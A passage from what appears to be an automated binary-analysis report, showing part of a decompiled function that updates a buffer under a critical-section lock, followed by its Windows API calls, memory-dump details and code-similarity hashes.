    					_t13 = E00411C89(0x7d0, 0x422b08);
    					if(_t13 != 0) {
    						_t18 = 0x3e8 - _t37;
    						_t19 =  *0x422b08; // 0x0
    						E00411D3A(_t19, _t19 + (( *0x422b10 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
    						_t13 = E00411D3A(0x3e8 - _t37 + _t18 +  *0x422b08, _v8, _t37 + _t37);
    						 *0x422b10 = 0x3e8;
    					}
    				}
    				LeaveCriticalSection(0x422b14);
    				return _t13;
    			}


    APIs
    • EnterCriticalSection.KERNEL32(00422B14,?,?,?,0041046C,?), ref: 00410196
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • LeaveCriticalSection.KERNEL32(00422B14,?,?,?,0041046C,?), ref: 004101B7
    • EnterCriticalSection.KERNEL32(00422B14,?,?,?,?,0041046C,?), ref: 004101C8
    • LeaveCriticalSection.KERNEL32(00422B14,?,?,?,0041046C,?), ref: 00410261
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$FreeHeap
    • String ID:
    • API String ID: 1946732658-0
    • Opcode ID: ebaba5a99235a608a2430792e46bfce08d6605d8dc6620ea8d5f0ede7bdac62f
    • Instruction ID: 432901c8a39dedcc9bc86719a24562a25592633b0c44dc6362db4010ae1a70de
    • Opcode Fuzzy Hash: ebaba5a99235a608a2430792e46bfce08d6605d8dc6620ea8d5f0ede7bdac62f
    • Instruction Fuzzy Hash: 1C21A475700115ABCB15DF94EE94DB93B68AB84308740092BF501A7171EBB86986C7AD
    Uniqueness

    Uniqueness Score: -1.00%